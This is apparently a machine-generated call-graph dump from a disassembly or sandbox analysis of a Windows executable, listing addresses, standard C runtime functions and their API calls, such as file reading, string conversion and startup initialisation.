1319b9e 16341 131995f 16333->16341 16336 1319b81 16334->16336 16338 1321788 pre_c_initialization 26 API calls 16336->16338 16338->16331 16340->16333 16345 1319971 ___scrt_get_show_window_mode 16341->16345 16347 131998e 16341->16347 16342 131997e 16343 131c9ce _free 20 API calls 16342->16343 16344 1319983 16343->16344 16346 1321788 pre_c_initialization 26 API calls 16344->16346 16345->16342 16345->16347 16349 13199d1 __fread_nolock 16345->16349 16346->16347 16354 1319bd3 16347->16354 16348 1319aed ___scrt_get_show_window_mode 16352 131c9ce _free 20 API calls 16348->16352 16349->16347 16349->16348 16351 13209c5 __fread_nolock 26 API calls 16349->16351 16357 1322128 16349->16357 16422 1319bdb 16349->16422 16351->16349 16352->16344 16465 131a85b LeaveCriticalSection 16354->16465 16356 1319bd9 16356->16331 16358 1322152 16357->16358 16359 132213a 16357->16359 16360 13224bc 16358->16360 16364 1322197 16358->16364 16361 131c9bb __dosmaperr 20 API calls 16359->16361 16363 131c9bb __dosmaperr 20 API calls 16360->16363 16362 132213f 16361->16362 16365 131c9ce _free 20 API calls 16362->16365 16366 13224c1 16363->16366 16368 13221a2 16364->16368 16369 1322147 16364->16369 16375 13221d2 16364->16375 16365->16369 16367 131c9ce _free 20 API calls 16366->16367 16370 13221af 16367->16370 16371 131c9bb __dosmaperr 20 API calls 16368->16371 16369->16349 16373 1321788 pre_c_initialization 26 API calls 16370->16373 16372 13221a7 16371->16372 16374 131c9ce _free 20 API calls 16372->16374 16373->16369 16374->16370 16376 13221eb 16375->16376 16377 1322211 16375->16377 16378 132222d 16375->16378 16376->16377 16411 13221f8 16376->16411 16379 131c9bb __dosmaperr 20 API calls 16377->16379 16436 1320a25 16378->16436 16380 1322216 16379->16380 16382 131c9ce _free 20 API calls 16380->16382 16385 132221d 16382->16385 16383 1328d71 __fread_nolock 26 API calls 16386 1322396 16383->16386 16388 1321788 pre_c_initialization 26 API calls 16385->16388 16389 132240c 16386->16389 16392 13223af GetConsoleMode 16386->16392 16387 13209eb _free 20 API calls 16390 132224d 16387->16390 16420 1322228 __fread_nolock 16388->16420 16391 1322410 ReadFile 16389->16391 16392->16389 16397 13223c0 16392->16397 16397->16391 16411->16383 16423 1319bec 16422->16423 16429 1319be8 __fread_nolock 16422->16429 16424 1319bf3 16423->16424 16428 1319c06 ___scrt_get_show_window_mode 16423->16428 16425 131c9ce _free 20 API calls 16424->16425 16426 1319bf8 16425->16426 16427 1321788 pre_c_initialization 26 API calls 16426->16427 16427->16429 16428->16429 16430 1319c34 16428->16430 16431 1319c3d 16428->16431 16429->16349 16432 131c9ce _free 20 API calls 16430->16432 16431->16429 16434 131c9ce _free 20 API calls 16431->16434 16433 1319c39 16432->16433 16435 1321788 pre_c_initialization 26 API calls 16433->16435 16434->16433 16435->16429 16437 1320a63 16436->16437 16441 1320a33 _free 16436->16441 16439 131c9ce _free 20 API calls 16437->16439 16438 1320a4e RtlAllocateHeap 16440 1320a61 16438->16440 16438->16441 16439->16440 16440->16387 16441->16437 16441->16438 16442 1328686 _free 7 API calls 16441->16442 16442->16441 16465->16356 16467 1319895 ___scrt_is_nonwritable_in_current_image 16466->16467 16468 13198a6 16467->16468 16469 13198bb 16467->16469 16470 131c9ce _free 20 API calls 16468->16470 16478 13198b6 ___scrt_is_nonwritable_in_current_image 16469->16478 16479 131a847 EnterCriticalSection 16469->16479 16472 13198ab 16470->16472 16473 1321788 pre_c_initialization 26 API calls 16472->16473 16473->16478 16474 13198d7 16480 1319813 16474->16480 16478->16030 16479->16474 16481 1319820 16480->16481 16482 1319835 16480->16482 16483 131c9ce _free 20 API calls 16481->16483 16484 131da31 62 API calls 16482->16484 16494 1319830 16482->16494 16563 1314c56 16562->16563 16564 1314bfa MultiByteToWideChar 16562->16564 16565 1314c5a MultiByteToWideChar 16563->16565 16566 1314c14 16564->16566 16567 1314c2b 16564->16567 16568 1314c73 16565->16568 16569 1314c8a 16565->16569 16580 1311860 GetLastError 16566->16580 16567->16565 16573 1314c3f 16567->16573 16572 1311860 57 API calls 16568->16572 16569->16034 16574 1314c82 16572->16574 16575 1311860 57 API calls 16573->16575 16574->16034 16576 1314c4e 16575->16576 16576->16034 16971 131d56e 16577->16971 16579 131290f 16579->16039 16581 13118a5 ___scrt_initialize_default_local_stdio_options 16580->16581 16592 131c90d 16581->16592 16585 13118b9 16609 1311ac0 16585->16609 16589 13118eb 16590 131786a _ValidateLocalCookies 5 API calls 16589->16590 16591 13118fe 16590->16591 16591->16034 16625 131a893 16592->16625 16595 1314860 16596 131486a __wsopen_s 16595->16596 16597 1314883 GetLastError 16596->16597 16598 1314889 FormatMessageW 16596->16598 16597->16598 16599 13148d8 16598->16599 16600 13148ac 16598->16600 16956 1314c90 16599->16956 16601 1311860 57 API calls 16600->16601 16603 13148bb 16601->16603 16605 131786a _ValidateLocalCookies 5 API calls 16603->16605 16604 13148ec 16606 131786a _ValidateLocalCookies 5 API calls 16604->16606 16608 13148d1 16605->16608 16607 131490e 16606->16607 16607->16585 16608->16585 16610 1311ad8 ___scrt_initialize_default_local_stdio_options 16609->16610 16611 131c90d 50 API calls 16610->16611 16612 13118d7 16611->16612 16613 13119f0 16612->16613 16614 13119fa __wsopen_s ___scrt_get_show_window_mode 16613->16614 16615 1314bf0 57 API calls 16614->16615 16616 1311a3c 16615->16616 16617 1311a43 16616->16617 16618 1311a89 MessageBoxA 16616->16618 16619 1314bf0 57 API calls 16617->16619 16620 131786a _ValidateLocalCookies 5 API calls 16618->16620 16621 1311a53 MessageBoxW 16619->16621 16622 1311aaa 16620->16622 16623 131786a _ValidateLocalCookies 5 API calls 16621->16623 16622->16589 16624 1311a82 16623->16624 16624->16589 16626 131a8d3 16625->16626 16627 131a8bb 16625->16627 16626->16627 16629 131a8db 16626->16629 16628 131c9ce _free 20 API calls 16627->16628 16630 131a8c0 16628->16630 16642 131afae 16629->16642 16632 1321788 pre_c_initialization 26 API calls 16630->16632 16640 131a8cb 16632->16640 16634 131786a _ValidateLocalCookies 5 API calls 16636 13118b3 16634->16636 16636->16595 16640->16634 16643 131a8eb 16642->16643 16644 131afcb 16642->16644 16650 131af44 16643->16650 16644->16643 16645 1324425 pre_c_initialization 38 API calls 16644->16645 16646 131afec 16645->16646 16647 1324574 __cftof 38 API calls 16646->16647 16648 131b005 16647->16648 16670 13245a1 16648->16670 16651 131af63 16650->16651 16652 131c9ce _free 20 API calls 16651->16652 16653 131a963 16652->16653 16654 131b242 16653->16654 16688 132151c 16654->16688 16656 131b267 16657 131c9ce _free 20 API calls 16656->16657 16659 131b26c 16657->16659 16658 131a96e 16667 131b031 16658->16667 16660 1321788 pre_c_initialization 26 API calls 16659->16660 16660->16658 16661 131b252 16661->16656 16661->16658 16695 131b4f8 16661->16695 16703 131bd9e 16661->16703 16708 131b5dc 16661->16708 16713 131b62d 16661->16713 16742 131b912 16661->16742 16668 13209eb _free 20 API calls 16667->16668 16669 131b041 16668->16669 16669->16640 16671 13245b4 16670->16671 16673 13245c9 16670->16673 16671->16673 16674 1327996 16671->16674 16673->16643 16675 13279a2 ___scrt_is_nonwritable_in_current_image 16674->16675 16676 1324425 pre_c_initialization 38 API calls 16675->16676 16681 13279ac 16676->16681 16678 1327a30 ___scrt_is_nonwritable_in_current_image 16678->16673 16679 1320acd _abort 38 API calls 16679->16681 16681->16678 16681->16679 16682 13209eb _free 20 API calls 16681->16682 16683 1325ffe EnterCriticalSection 16681->16683 16684 1327a27 16681->16684 16682->16681 16683->16681 16687 1326046 LeaveCriticalSection 16684->16687 16686 1327a2e 16686->16681 16687->16686 16689 1321521 16688->16689 16690 1321534 16688->16690 16691 131c9ce _free 20 API calls 16689->16691 16690->16661 16692 1321526 16691->16692 16693 1321788 pre_c_initialization 26 API calls 16692->16693 16694 1321531 16693->16694 16694->16661 16764 131b536 16695->16764 16697 131b4fd 16698 131b514 16697->16698 16699 131c9ce _free 20 API calls 16697->16699 16698->16661 16700 131b506 16699->16700 16701 1321788 pre_c_initialization 26 API calls 16700->16701 16702 131b511 16701->16702 16702->16661 16704 131bda4 16703->16704 16705 131bdae 16703->16705 16773 131b188 16704->16773 16705->16661 16709 131b5e2 16708->16709 16710 131b5ec 16708->16710 16711 131b188 42 API calls 16709->16711 16710->16661 16712 131b5eb 16711->16712 16712->16661 16714 131b634 16713->16714 16715 131b64e 16713->16715 16716 131b996 16714->16716 16717 131b92a 16714->16717 16729 131b67e 16714->16729 16718 131c9ce _free 20 API calls 16715->16718 16715->16729 16719 131b96e 16716->16719 16722 131b99d 16716->16722 16723 131b9dc 16716->16723 16717->16719 16724 131b937 16717->16724 16720 131b66a 16718->16720 16740 131b953 16719->16740 16741 131b967 16719->16741 16812 131c30b 16719->16812 16721 1321788 pre_c_initialization 26 API calls 16720->16721 16727 131b675 16721->16727 16725 131b945 16722->16725 16726 131b9a2 16722->16726 16826 131c4e8 16723->16826 16724->16725 16733 131b97d 16724->16733 16724->16740 16725->16740 16725->16741 16818 131bf17 16725->16818 16726->16719 16730 131b9a7 16726->16730 16727->16661 16729->16661 16734 131b9ba 16730->16734 16735 131b9ac 16730->16735 16733->16741 16798 131c1e3 16733->16798 16806 131c455 16734->16806 16735->16741 16802 131c4c9 16735->16802 16740->16741 16829 131c6ae 16740->16829 16741->16661 16743 131b996 16742->16743 16744 131b92a 16742->16744 16745 131b96e 16743->16745 16746 131b99d 16743->16746 16747 131b9dc 16743->16747 16744->16745 16748 131b937 16744->16748 16754 131c30b 26 API calls 16745->16754 16762 131b953 16745->16762 16763 131b967 16745->16763 16749 131b9a2 16746->16749 16757 131b945 16746->16757 16750 131c4e8 26 API calls 16747->16750 16753 131b97d 16748->16753 16748->16757 16748->16762 16749->16745 16752 131b9a7 16749->16752 16750->16762 16751 131bf17 48 API calls 16751->16762 16755 131b9ba 16752->16755 16756 131b9ac 16752->16756 16759 131c1e3 40 API calls 16753->16759 16753->16763 16754->16762 16758 131c455 26 API calls 16755->16758 16760 131c4c9 26 API calls 16756->16760 16756->16763 16757->16751 16757->16762 16757->16763 16758->16762 16759->16762 16760->16762 16761 131c6ae 40 API calls 16761->16763 16762->16761 16762->16763 16763->16661 16767 131b57b 16764->16767 16766 131b542 16766->16697 16768 131b59d 16767->16768 16772 131b5d1 16767->16772 16769 131c9ce _free 20 API calls 16768->16769 16768->16772 16770 131b5c6 16769->16770 16771 1321788 pre_c_initialization 26 API calls 16770->16771 16771->16772 16772->16766 16776 1323e09 16773->16776 16777 1323e24 16776->16777 16780 1320bbb 16777->16780 16781 132151c 26 API calls 16780->16781 16782 1320bcd 16781->16782 16783 1320c08 16782->16783 16785 1320be2 16782->16785 16797 131b1af 16782->16797 16784 131afae __cftof 38 API calls 16783->16784 16790 1320c14 16784->16790 16786 131c9ce _free 20 API calls 16785->16786 16787 1320be7 16786->16787 16789 1321788 pre_c_initialization 26 API calls 16787->16789 16788 1321561 42 API calls 16788->16790 16789->16797 16790->16788 16791 1320c43 16790->16791 16793 13214c8 26 API calls 16791->16793 16794 1320caf 16791->16794 16792 13214c8 26 API calls 16795 1320d76 16792->16795 16793->16794 16794->16792 16796 131c9ce _free 20 API calls 16795->16796 16795->16797 16796->16797 16797->16661 16800 131c1fb 16798->16800 16799 131c230 16799->16740 16800->16799 16835 1324096 16800->16835 16803 131c4d5 16802->16803 16804 131c30b 26 API calls 16803->16804 16805 131c4e7 16804->16805 16805->16740 16808 131c46a 16806->16808 16807 131c9ce _free 20 API calls 16809 131c473 16807->16809 16808->16807 16811 131c47e 16808->16811 16810 1321788 pre_c_initialization 26 API calls 16809->16810 16810->16811 16811->16740 16813 131c31c 16812->16813 16814 131c9ce _free 20 API calls 16813->16814 16817 131c346 16813->16817 16815 131c33b 16814->16815 16816 1321788 pre_c_initialization 26 API calls 16815->16816 16816->16817 16817->16740 16820 131bf2d 16818->16820 16857 131abac 16820->16857 16821 131bf74 16867 1324e99 16821->16867 16825 131c00d 16825->16740 16827 131c30b 26 API calls 16826->16827 16828 131c4ff 16827->16828 16828->16740 16833 131c720 16829->16833 16834 131c6cb 16829->16834 16830 131786a _ValidateLocalCookies 5 API calls 16832 131c74f 16830->16832 16831 1324096 __cftof 40 API calls 16831->16834 16832->16741 16833->16830 16834->16831 16834->16833 16838 1323f75 16835->16838 16839 1323f89 16838->16839 16840 1323fae 16839->16840 16841 1323fbf 16839->16841 16850 1323f8d 16839->16850 16842 131c9ce _free 20 API calls 16840->16842 16843 131afae __cftof 38 API calls 16841->16843 16844 1323fb3 16842->16844 16845 1323fca 16843->16845 16846 1321788 pre_c_initialization 26 API calls 16844->16846 16847 1323fd7 16845->16847 16848 1324034 WideCharToMultiByte 16845->16848 16846->16850 16853 1323fe5 ___scrt_get_show_window_mode 16847->16853 16854 132401b ___scrt_get_show_window_mode 16847->16854 16849 1324064 GetLastError 16848->16849 16848->16853 16849->16853 16849->16854 16850->16799 16851 131c9ce _free 20 API calls 16851->16850 16852 131c9ce _free 20 API calls 16855 1324087 16852->16855 16853->16850 16853->16851 16854->16850 16854->16852 16856 1321788 pre_c_initialization 26 API calls 16855->16856 16856->16850 16858 131abd7 16857->16858 16859 131abc8 16857->16859 16861 131abcd 16858->16861 16862 1320a25 __fread_nolock 21 API calls 16858->16862 16860 131c9ce _free 20 API calls 16859->16860 16860->16861 16861->16821 16863 131abfe 16862->16863 16864 131ac15 16863->16864 16899 131b04b 16863->16899 16866 13209eb _free 20 API calls 16864->16866 16866->16861 16868 1324ea9 16867->16868 16869 1324ebf 16867->16869 16870 131c9ce _free 20 API calls 16868->16870 16871 1324ed3 16869->16871 16875 1324ee9 16869->16875 16872 1324eae 16870->16872 16873 131c9ce _free 20 API calls 16871->16873 16874 1321788 pre_c_initialization 26 API calls 16872->16874 16876 1324ed8 16873->16876 16878 131bfee 16874->16878 16880 1324f45 16875->16880 16881 1324f23 16875->16881 16877 1321788 pre_c_initialization 26 API calls 16876->16877 16877->16878 16878->16825 16892 131b12c 16878->16892 16879 1324f63 16884 1324fc2 16879->16884 16885 1324f8c 16879->16885 16880->16879 16882 1324f68 16880->16882 16902 1324d6d 16881->16902 16912 1324658 16882->16912 16940 132495b 16884->16940 16887 1324f91 16885->16887 16888 1324faa 16885->16888 16923 1324ca5 16887->16923 16933 1324b41 16888->16933 16947 1323dd9 16892->16947 16900 13209eb _free 20 API calls 16899->16900 16901 131b05a 16900->16901 16901->16864 16903 1324d93 16902->16903 16906 1324da8 16902->16906 16904 131786a _ValidateLocalCookies 5 API calls 16903->16904 16905 1324da4 16904->16905 16905->16878 16907 1320a73 26 API calls 16906->16907 16908 1324e4b 16907->16908 16908->16903 16913 132466c 16912->16913 16914 131afae __cftof 38 API calls 16913->16914 16934 132974e 28 API calls 16933->16934 16941 132974e 28 API calls 16940->16941 16957 1314cf8 16956->16957 16958 1314c9a WideCharToMultiByte 16956->16958 16959 1314cfc WideCharToMultiByte 16957->16959 16960 1314cb6 16958->16960 16966 1314ccd 16958->16966 16961 1314d30 16959->16961 16962 1314d19 16959->16962 16963 1311860 57 API calls 16960->16963 16961->16604 16964 1311860 57 API calls 16962->16964 16965 1314cc5 16963->16965 16968 1314d28 16964->16968 16965->16604 16966->16959 16967 1314ce1 16966->16967 16969 1311860 57 API calls 16967->16969 16968->16604 16970 1314cf0 16969->16970 16970->16604 16973 131d57a ___scrt_is_nonwritable_in_current_image 16971->16973 16972 131d588 16974 131c9ce _free 20 API calls 16972->16974 16973->16972 16975 131d5b8 16973->16975 16976 131d58d 16974->16976 16977 131d5ca 16975->16977 16978 131d5bd 16975->16978 16979 1321788 pre_c_initialization 26 API calls 16976->16979 16988 1321990 16977->16988 16980 131c9ce _free 20 API calls 16978->16980 16982 131d598 ___scrt_is_nonwritable_in_current_image 16979->16982 16980->16982 16982->16579 16983 131d5d3 16984 131d5e6 16983->16984 16985 131d5d9 16983->16985 16996 131d618 16984->16996 16986 131c9ce _free 20 API calls 16985->16986 16986->16982 16989 132199c ___scrt_is_nonwritable_in_current_image 16988->16989 17000 1325ffe EnterCriticalSection 16989->17000 16991 13219aa 17001 1321a2a 16991->17001 16995 13219db ___scrt_is_nonwritable_in_current_image 16995->16983 16997 131d61c 16996->16997 17028 131a85b LeaveCriticalSection 16997->17028 16999 131d62d 16999->16982 17000->16991 17008 1321a4d 17001->17008 17002 13219b7 17014 13219e6 17002->17014 17003 1321aa6 17004 1320b10 _free 20 API calls 17003->17004 17005 1321aaf 17004->17005 17007 13209eb _free 20 API calls 17005->17007 17009 1321ab8 17007->17009 17008->17002 17008->17003 17017 131a847 EnterCriticalSection 17008->17017 17018 131a85b LeaveCriticalSection 17008->17018 17009->17002 17019 132391e 17009->17019 17027 1326046 LeaveCriticalSection 17014->17027 17016 13219ed 17016->16995 17017->17008 17018->17008 17020 1323587 _free 5 API calls 17019->17020 17021 1323945 17020->17021 17022 1323963 InitializeCriticalSectionAndSpinCount 17021->17022 17023 132394e 17021->17023 17022->17023 17024 131786a _ValidateLocalCookies 5 API calls 17023->17024 17025 1321ad7 17024->17025 17026 131a847 EnterCriticalSection 17025->17026 17026->17002 17027->17016 17028->16999 17034 131c9e1 17029->17034 17030 13244a9 _free 20 API calls 17030->17034 17031 1320b10 _free 20 API calls 17031->17034 17033 13209eb _free 20 API calls 17033->17034 17034->17029 17034->17030 17034->17031 17034->17033 17035 1311806 17034->17035 17036 1321798 __wsopen_s 11 API calls 17034->17036 17037 13250a9 17034->17037 17035->16049 17036->17034 17039 1324ff8 17037->17039 17038 131c9ce _free 20 API calls 17040 1325038 17038->17040 17041 1325012 17039->17041 17042 132500d 17039->17042 17044 1325049 17039->17044 17043 1321788 pre_c_initialization 26 API calls 17040->17043 17041->17034 17042->17038 17042->17041 17043->17041 17044->17041 17045 131c9ce _free 20 API calls 17044->17045 17045->17040 20875 13202e3 20876 13202ef ___scrt_is_nonwritable_in_current_image 20875->20876 20879 1320326 ___scrt_is_nonwritable_in_current_image 20876->20879 20883 1325ffe EnterCriticalSection 20876->20883 20878 1320303 20884 13284bf 20878->20884 20883->20878 20885 13284cd __cftof 20884->20885 20887 1320313 20884->20887 20885->20887 20891 13281fb 20885->20891 20888 132032c 20887->20888 21005 1326046 LeaveCriticalSection 20888->21005 20890 1320333 20890->20879 20892 1328211 20891->20892 20894 132827b 20891->20894 20892->20894 20897 1328244 20892->20897 20902 13209eb _free 20 API calls 20892->20902 20895 13209eb _free 20 API calls 20894->20895 20918 13282c9 20894->20918 20896 132829d 20895->20896 20898 13209eb _free 20 API calls 20896->20898 20899 1328266 20897->20899 20904 13209eb _free 20 API calls 20897->20904 20900 13282b0 20898->20900 20901 13209eb _free 20 API calls 20899->20901 20903 13209eb _free 20 API calls 20900->20903 20905 1328270 20901->20905 20907 1328239 20902->20907 20909 13282be 20903->20909 20910 132825b 20904->20910 20911 13209eb _free 20 API calls 20905->20911 20906 1328337 20912 13209eb _free 20 API calls 20906->20912 20919 1327d80 20907->20919 20908 13282d7 20908->20906 20914 13209eb 20 API calls _free 20908->20914 20915 13209eb _free 20 API calls 20909->20915 20947 1327e7e 20910->20947 20911->20894 20917 132833d 20912->20917 20914->20908 20915->20918 20917->20887 20959 132836e 20918->20959 20920 1327d91 20919->20920 20946 1327e7a 20919->20946 20921 1327da2 20920->20921 20922 13209eb _free 20 API calls 20920->20922 20923 1327db4 20921->20923 20924 13209eb _free 20 API calls 20921->20924 20922->20921 20925 13209eb _free 20 API calls 20923->20925 20926 1327dc6 20923->20926 20924->20923 20925->20926 20927 13209eb _free 20 API calls 20926->20927 20928 1327dd8 20926->20928 20927->20928 20929 1327dea 20928->20929 20930 13209eb _free 20 API calls 20928->20930 20931 1327dfc 20929->20931 20932 13209eb _free 20 API calls 20929->20932 20930->20929 20933 1327e0e 20931->20933 20935 13209eb _free 20 API calls 20931->20935 20932->20931 20934 1327e20 20933->20934 20936 13209eb _free 20 API calls 20933->20936 20937 1327e32 20934->20937 20938 13209eb _free 20 API calls 20934->20938 20935->20933 20936->20934 20939 1327e44 20937->20939 20940 13209eb _free 20 API calls 20937->20940 20938->20937 20941 1327e56 20939->20941 20943 13209eb _free 20 API calls 20939->20943 20940->20939 20942 1327e68 20941->20942 20944 13209eb _free 20 API calls 20941->20944 20945 13209eb _free 20 API calls 20942->20945 20942->20946 20943->20941 20944->20942 20945->20946 20946->20897 20948 1327ee3 20947->20948 20949 1327e8b 20947->20949 20948->20899 20950 1327e9b 20949->20950 20952 13209eb _free 20 API calls 20949->20952 20951 1327ead 20950->20951 20953 13209eb _free 20 API calls 20950->20953 20954 1327ebf 20951->20954 20955 13209eb _free 20 API calls 20951->20955 20952->20950 20953->20951 20956 1327ed1 20954->20956 20957 13209eb _free 20 API calls 20954->20957 20955->20954 20956->20948 20958 13209eb _free 20 API calls 20956->20958 20957->20956 20958->20948 20960 1328399 20959->20960 20961 132837b 20959->20961 20960->20908 20961->20960 20965 1327f23 20961->20965 20964 13209eb _free 20 API calls 20964->20960 20966 1328001 20965->20966 20967 1327f34 20965->20967 20966->20964 21001 1327ee7 20967->21001 20970 1327ee7 __cftof 20 API calls 20971 1327f47 20970->20971 20972 1327ee7 __cftof 20 API calls 20971->20972 20973 1327f52 20972->20973 20974 1327ee7 __cftof 20 API calls 20973->20974 20975 1327f5d 20974->20975 20976 1327ee7 __cftof 20 API calls 20975->20976 20977 1327f6b 20976->20977 20978 13209eb _free 20 API calls 20977->20978 20979 1327f76 20978->20979 20980 13209eb _free 20 API calls 20979->20980 20981 1327f81 20980->20981 20982 13209eb _free 20 API calls 20981->20982 20983 1327f8c 20982->20983 20984 1327ee7 __cftof 20 API calls 20983->20984 20985 1327f9a 20984->20985 20986 1327ee7 __cftof 20 API calls 20985->20986 20987 1327fa8 20986->20987 20988 1327ee7 __cftof 20 API calls 20987->20988 20989 1327fb9 20988->20989 20990 1327ee7 __cftof 20 API calls 20989->20990 20991 1327fc7 20990->20991 20992 1327ee7 __cftof 20 API calls 20991->20992 20993 1327fd5 20992->20993 20994 13209eb _free 20 API calls 20993->20994 20995 1327fe0 20994->20995 20996 13209eb _free 20 API calls 20995->20996 21002 1327f1e 21001->21002 21003 1327f0e 21001->21003 21002->20970 21003->21002 21004 13209eb _free 20 API calls 21003->21004 21004->21003 21005->20890 19834 132c860 19837 1327978 19834->19837 19838 132798a 19837->19838 19839 1327981 19837->19839 19841 1327877 19839->19841 19842 1324425 pre_c_initialization 38 API calls 19841->19842 19843 1327884 19842->19843 19844 1327996 __cftof 38 API calls 19843->19844 19845 132788c 19844->19845 19861 132760b 19845->19861 19848 1320a25 __fread_nolock 21 API calls 19849 13278b4 19848->19849 19860 13278e6 19849->19860 19868 1327a38 19849->19868 19852 13209eb _free 20 API calls 19854 13278a3 19852->19854 19853 13278e1 19855 131c9ce _free 20 API calls 19853->19855 19854->19838 19855->19860 19856 132792a 19856->19860 19878 13274e1 19856->19878 19857 13278fe 19857->19856 19858 13209eb _free 20 API calls 19857->19858 19858->19856 19860->19852 19862 131afae __cftof 38 API calls 19861->19862 19863 132761d 19862->19863 19864 132763e 19863->19864 19865 132762c GetOEMCP 19863->19865 19866 1327655 19864->19866 19867 1327643 GetACP 19864->19867 19865->19866 19866->19848 19866->19854 19867->19866 19869 132760b 40 API calls 19868->19869 19870 1327a57 19869->19870 19873 1327aa8 IsValidCodePage 19870->19873 19875 1327a5e 19870->19875 19877 1327acd ___scrt_get_show_window_mode 19870->19877 19871 131786a _ValidateLocalCookies 5 API calls 19872 13278d9 19871->19872 19872->19853 19872->19857 19874 1327aba GetCPInfo 19873->19874 19873->19875 19874->19875 19874->19877 19875->19871 19881 13276e3 GetCPInfo 19877->19881 19954 132749e 19878->19954 19880 1327505 19880->19860 19882 13277c7 19881->19882 19886 132771d 19881->19886 19885 131786a _ValidateLocalCookies 5 API calls 19882->19885 19888 1327873 19885->19888 19891 1328041 19886->19891 19888->19875 19890 132916e 43 API calls 19890->19882 19892 131afae __cftof 38 API calls 19891->19892 19893 1328061 MultiByteToWideChar 19892->19893 19895 1328137 19893->19895 19896 132809f 19893->19896 19897 131786a _ValidateLocalCookies 5 API calls 19895->19897 19899 1320a25 __fread_nolock 21 API calls 19896->19899 19901 13280c0 ___scrt_get_show_window_mode 19896->19901 19900 132777e 19897->19900 19898 1328131 19910 132815e 19898->19910 19899->19901 19905 132916e 19900->19905 19901->19898 19903 1328105 MultiByteToWideChar 19901->19903 19903->19898 19904 1328121 GetStringTypeW 19903->19904 19904->19898 19906 131afae __cftof 38 API calls 19905->19906 19907 1329181 19906->19907 19914 1328f51 19907->19914 19911 132816a 19910->19911 19912 132817b 19910->19912 19911->19912 19913 13209eb _free 20 API calls 19911->19913 19912->19895 19913->19912 19915 1328f6c 19914->19915 19916 1328f92 MultiByteToWideChar 19915->19916 19918 1328fbc 19916->19918 19927 1329146 19916->19927 19917 131786a _ValidateLocalCookies 5 API calls 19919 132779f 19917->19919 19920 1328fdd 19918->19920 19921 1320a25 __fread_nolock 21 API calls 19918->19921 19919->19890 19922 1329026 MultiByteToWideChar 19920->19922 19923 1329092 19920->19923 19921->19920 19922->19923 19924 132903f 19922->19924 19926 132815e __freea 20 API calls 19923->19926 19941 1323980 19924->19941 19926->19927 19927->19917 19942 1323587 _free 5 API calls 19941->19942 19943 13239a7 19942->19943 19946 13239b0 19943->19946 19949 1323a08 19943->19949 19955 13274aa ___scrt_is_nonwritable_in_current_image 19954->19955 19962 1325ffe EnterCriticalSection 19955->19962 19957 13274b4 19963 1327509 19957->19963 19961 13274cd ___scrt_is_nonwritable_in_current_image 19961->19880 19962->19957 19964 1319bdb __fread_nolock 26 API calls 19963->19964 19965 1327557 19964->19965 19966 1319bdb __fread_nolock 26 API calls 19965->19966 19967 1327573 19966->19967 19968 1319bdb __fread_nolock 26 API calls 19967->19968 19969 1327591 19968->19969 19970 13274c1 19969->19970 19971 13209eb _free 20 API calls 19969->19971 19972 13274d5 19970->19972 19971->19970 19975 1326046 LeaveCriticalSection 19972->19975 19974 13274df 19974->19961 19975->19974 17343 131796b 17344 1317977 ___scrt_is_nonwritable_in_current_image 17343->17344 17368 1317e02 17344->17368 17347 131797e 17348 13179a7 17347->17348 17397 1318111 IsProcessorFeaturePresent 17347->17397 17356 13179e6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 17348->17356 17379 131ffe7 17348->17379 17352 13179c6 ___scrt_is_nonwritable_in_current_image 17353 1317a46 17387 131822c 17353->17387 17355 1317a4c 17391 1311000 17355->17391 17356->17353 17401 132028a 17356->17401 17369 1317e0b 17368->17369 17421 131836b IsProcessorFeaturePresent 17369->17421 17373 1317e1c 17374 1317e20 17373->17374 17432 13208aa 17373->17432 17374->17347 17377 1317e37 17377->17347 17381 131fffe 17379->17381 17380 131786a _ValidateLocalCookies 5 API calls 17382 13179c0 17380->17382 17381->17380 17382->17352 17383 131ff8b 17382->17383 17384 131ffba 17383->17384 17385 131786a _ValidateLocalCookies 5 API calls 17384->17385 17386 131ffe3 17385->17386 17386->17356 17554 1318520 17387->17554 17389 131823f GetStartupInfoW 17390 1318252 17389->17390 17390->17355 17392 1311006 17391->17392 17556 1314a10 17392->17556 17394 1311016 17564 1312450 17394->17564 17398 1318127 ___scrt_get_show_window_mode 17397->17398 17399 13181cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17398->17399 17400 1318219 17399->17400 17400->17347 17402 13202b2 pre_c_initialization _abort 17401->17402 17402->17353 17403 1324425 pre_c_initialization 38 API calls 17402->17403 17406 132093e 17403->17406 17404 1320acd _abort 38 API calls 17405 1320968 17404->17405 17406->17404 17422 1317e17 17421->17422 17423 13190d6 17422->17423 17424 13190db ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 17423->17424 17443 13192e8 17424->17443 17428 13190f1 17429 13190fc 17428->17429 17457 1319324 17428->17457 17429->17373 17431 13190e9 17431->17373 17498 13285a2 17432->17498 17435 13190ff 17436 1319108 17435->17436 17442 1319119 17435->17442 17437 13192cd ___vcrt_uninitialize_ptd 6 API calls 17436->17437 17438 131910d 17437->17438 17439 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 17438->17439 17440 1319112 17439->17440 17550 13195c2 17440->17550 17442->17374 17445 13192f1 17443->17445 17446 131931a 17445->17446 17447 13190e5 17445->17447 17461 1319542 17445->17461 17448 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 17446->17448 17447->17431 17449 131929a 17447->17449 17448->17447 17479 1319491 17449->17479 17451 13192a4 17452 13192af 17451->17452 17484 1319505 17451->17484 17452->17428 17454 13192bd 17455 13192ca 17454->17455 17489 13192cd 17454->17489 17455->17428 17458 131934e 17457->17458 17459 131932f 17457->17459 17458->17431 17460 1319339 DeleteCriticalSection 17459->17460 17460->17458 17460->17460 17466 1319370 17461->17466 17463 131955c 17464 1319579 InitializeCriticalSectionAndSpinCount 17463->17464 17465 1319565 17463->17465 17464->17465 17465->17445 17467 13193a4 __crt_fast_encode_pointer 17466->17467 17470 13193a0 17466->17470 17467->17463 17468 13193c4 17468->17467 17471 13193d0 GetProcAddress 17468->17471 17470->17467 17470->17468 17472 1319410 17470->17472 17471->17467 17473 1319438 LoadLibraryExW 17472->17473 17474 131942d 17472->17474 17475 1319454 GetLastError 17473->17475 17476 131946c 17473->17476 17474->17470 17475->17476 17478 131945f LoadLibraryExW 17475->17478 17476->17474 17477 1319483 FreeLibrary 17476->17477 17477->17474 17478->17476 17480 1319370 try_get_function 5 API calls 17479->17480 17481 13194ab 17480->17481 17482 13194c3 TlsAlloc 17481->17482 17483 13194b4 17481->17483 17483->17451 17485 1319370 try_get_function 5 API calls 17484->17485 17486 131951f 17485->17486 17487 1319539 TlsSetValue 17486->17487 17488 131952e 17486->17488 17487->17488 17488->17454 17490 13192dd 